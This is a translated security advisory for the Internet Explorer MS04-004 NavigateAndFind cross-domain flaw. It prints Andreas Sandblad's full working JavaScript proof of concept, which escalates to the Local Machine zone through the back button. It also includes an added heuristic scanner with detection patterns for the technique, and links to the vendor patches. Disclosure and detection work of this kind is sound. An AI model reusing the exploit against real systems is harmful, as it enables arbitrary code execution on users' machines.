
Security Research

Security Vulnerability
Microsoft Internet Explorer NavigateAndFind() Cross-Domain Policy Vulnerability (MS04-004)

Published: 2004-02-03
Updated: 2004-02-11

Affected systems:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
Description:
BUGTRAQ  ID: 9568
CVE(CAN) ID: CVE-2003-1026

Microsoft Internet Explorer is a popular web browser.

Under certain conditions Microsoft Internet Explorer fails to remove javascript: URLs from the browser history list. A remote attacker can exploit this to bypass the cross-domain policy and execute arbitrary script in the Local Machine zone.

The cross-domain security model in Internet Explorer is meant to prevent windows from different domains from sharing information, and it contains a flaw. MSIE normally tries to remove javascript: URLs from the history list, but under some conditions this fails. If a javascript: URL navigates to a resource with external.NavigateAndFind('res:','',''), the res: URL moves the browser into the Local Machine zone; when the user returns to the javascript: URL (for example with the Back button), it is re-executed with Local Machine zone privileges.

To trigger this vulnerability the attacker must construct a malicious link or a malicious HTML e-mail and entice the user to open it.

<*Source: Andreas Sandblad (sandblad@acc.umu.se)
  
  Links: http://marc.theaimsgroup.com/?l=bugtraq&m=107584480026576&w=2
         http://www.microsoft.com/technet/security/bulletin/MS04-004.asp
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Andreas Sandblad (sandblad@acc.umu.se) provided the following test method:

// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands.
// This demo simply creates a harmless textfile on the desktop.
function payload() {
    var file = "sandblad.txt";
    var o = new ActiveXObject("ADODB.Stream");
    o.Open();
    o.Type = 2;              // adTypeText
    o.Charset = "ascii";
    o.WriteText("You are vulnerable!");
    o.SaveToFile(file, 2);   // adSaveCreateOverWrite; the relative path lands on the desktop
    o.Close();
    alert("File " + file + " created on desktop!");
}

// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
// On the first run history.length still equals len, so the function returns a
// page whose onload calls external.NavigateAndFind('res:','','') and the browser
// moves to a res: document in the Local Machine zone. When the user presses Back,
// IE re-executes this javascript: URL (which should have been dropped from the
// history); history.length now differs, so payload() runs in that zone.
function trigger(len) {
    if (history.length != len)
        payload();
    else
        return "<title>-</title><body onload=external.NavigateAndFind('res:','','')>";
}

// Name: backbutton
// Purpose: Run backbutton exploit.
// The source text of trigger() and payload() is concatenated into the javascript:
// URL so that both are defined in the context in which the URL executes.
function backbutton() {
    location = 'javascript:' + trigger + payload + 'trigger(' + history.length + ')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
    backbutton();
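As an added example, not part of the original advisory or of Sandblad's PoC, the following Node.js scanner flags the ingredients of this back-button technique in an HTML or HTML e-mail body: a javascript: URL being navigated to, external.NavigateAndFind() aimed at the res: scheme (Local Machine zone), a history.length comparison, and the ADODB.Stream payload used above. The rule set, the verdict names and the sample bodies are assumptions made for this example (the samples are constructed; one is a condensed copy of the PoC shape above), and the rules are heuristics rather than Microsoft's detection logic.

```javascript
// Added example (not from the advisory or the PoC author): heuristic scanner for
// the MS04-004 back-button technique in HTML / HTML-mail bodies.
// Rule ids and verdict strings are assumptions made for this example.
const RULES = [
  // navigating to a javascript: URL (location = 'javascript:...' or href="javascript:...")
  { id: "javascript-url-navigation",
    re: /(?:location|href)\s*=\s*["']?\s*javascript:/gi },
  // NavigateAndFind pointed at the res: scheme, which lands in the Local Machine zone
  { id: "navigateandfind-res",
    re: /external\s*\.\s*NavigateAndFind\s*\(\s*["']res:/gi },
  // the "did the user come back?" branch on history.length
  { id: "history-length-branch",
    re: /history\s*\.\s*length\s*(?:!=|==|!==|===)/gi },
  // the file-dropping payload used by the PoC
  { id: "adodb-stream",
    re: /new\s+ActiveXObject\s*\(\s*["']ADODB\.Stream["']\s*\)/gi },
];

// Undo two cheap evasions seen in HTML mail: numeric character references
// (&#106;avascript:) and whitespace inserted inside the scheme name, both of
// which IE of that era accepted in href attributes.
function normalize(html) {
  const decoded = html.replace(/&#(x[0-9a-f]+|\d+);/gi, (_, n) =>
    String.fromCharCode(n[0].toLowerCase() === "x" ? parseInt(n.slice(1), 16) : parseInt(n, 10)));
  return decoded.replace(/j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:/gi, "javascript:");
}

// Run every rule over the normalized body; report rule id, 1-based line and matched text.
function scanHtml(html) {
  const text = normalize(html);
  const findings = [];
  for (const { id, re } of RULES) {
    re.lastIndex = 0;
    let m;
    while ((m = re.exec(text)) !== null) {
      const line = text.slice(0, m.index).split("\n").length;
      findings.push({ rule: id, line, match: m[0] });
    }
  }
  return findings;
}

// Verdict: the exploit needs both the javascript: URL and the res: navigation;
// either half alone is only suspicious, a lone javascript: URL just needs review.
function classify(findings) {
  const hit = new Set(findings.map((f) => f.rule));
  if (hit.has("navigateandfind-res") && hit.has("javascript-url-navigation")) return "likely-exploit";
  if (hit.has("navigateandfind-res") || hit.has("adodb-stream")) return "suspicious";
  if (hit.size > 0) return "review";
  return "clean";
}

// Constructed sample bodies (not real captured mail): a condensed copy of the
// PoC shape, an entity-encoded javascript: href, and a benign page.
const SAMPLE_POC = `<script>
function payload() {
  o = new ActiveXObject("ADODB.Stream");
}
function trigger(len) {
  if (history.length != len) payload();
  else return "<title>-</title><body onload=external.NavigateAndFind('res:','','')>";
}
location = 'javascript:' + trigger + payload + 'trigger(' + history.length + ')';
</script>`;
const SAMPLE_ENCODED = '<a href="&#106;ava&#115;cript:alert(1)">x</a>';
const SAMPLE_CLEAN = "<html><body><p>Quarterly report attached.</p></body></html>";

for (const [name, body] of [["poc", SAMPLE_POC], ["encoded-href", SAMPLE_ENCODED], ["clean", SAMPLE_CLEAN]]) {
  const findings = scanHtml(body);
  console.log(name + ": " + classify(findings) + " " +
    findings.map((f) => f.rule + "@" + f.line).join(" "));
}
```

The scanner works on the normalized text rather than line by line so that a call split across a line wrap (as the PoC's onload string was in the advisory's own listing) is still matched; line numbers are therefore reported against the normalized body.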

Recommendations:
Vendor patches:

Microsoft
---------
Microsoft has released a security bulletin (MS04-004) and a corresponding patch:
MS04-004: Cumulative Security Update for Internet Explorer (832894)
Link: http://www.microsoft.com/technet/security/bulletin/MS04-004.asp

Patch downloads:

Internet Explorer 6 Service Pack 1

http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=en

Internet Explorer 6 Service Pack 1 (64-Bit Edition)

http://www.microsoft.com/downloads/details.aspx?FamilyId=326EFFDA-8D86-4683-BC77-9BF410BC620D&displaylang=en

Internet Explorer 6 for Windows Server 2003

http://www.microsoft.com/downloads/details.aspx?FamilyId=D78AE4F7-8852-4A04-B8F6-1DE327E598F0&displaylang=en

Internet Explorer 6 for Windows Server 2003 (64-Bit Edition)

http://www.microsoft.com/downloads/details.aspx?FamilyId=6A7894F0-789F-4152-9AE4-8DCB43404149&displaylang=en

Internet Explorer 6

http://www.microsoft.com/downloads/details.aspx?FamilyId=BE0C18BC-7F9A-4196-BFDE-29EBA8CF7A50&displaylang=en

Internet Explorer 5.5 Service Pack 2

http://www.microsoft.com/downloads/details.aspx?FamilyId=EFFE87F6-7ACA-4A54-B767-5597DDE95C6F&displaylang=en

Internet Explorer 5.01 Service Pack 4

http://www.microsoft.com/downloads/details.aspx?FamilyId=F5E74139-6E0E-49FD-9AA2-36D2D8454A92&displaylang=en

Internet Explorer 5.01 Service Pack 3

http://www.microsoft.com/downloads/details.aspx?FamilyId=202D3AAC-6B56-4F4A-8C0F-4183C77B6B51&displaylang=en

Internet Explorer 5.01 Service Pack 2

http://www.microsoft.com/downloads/details.aspx?FamilyId=17904608-DCEE-4C99-A780-81D6DBC48DD5&displaylang=en

This vulnerability advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.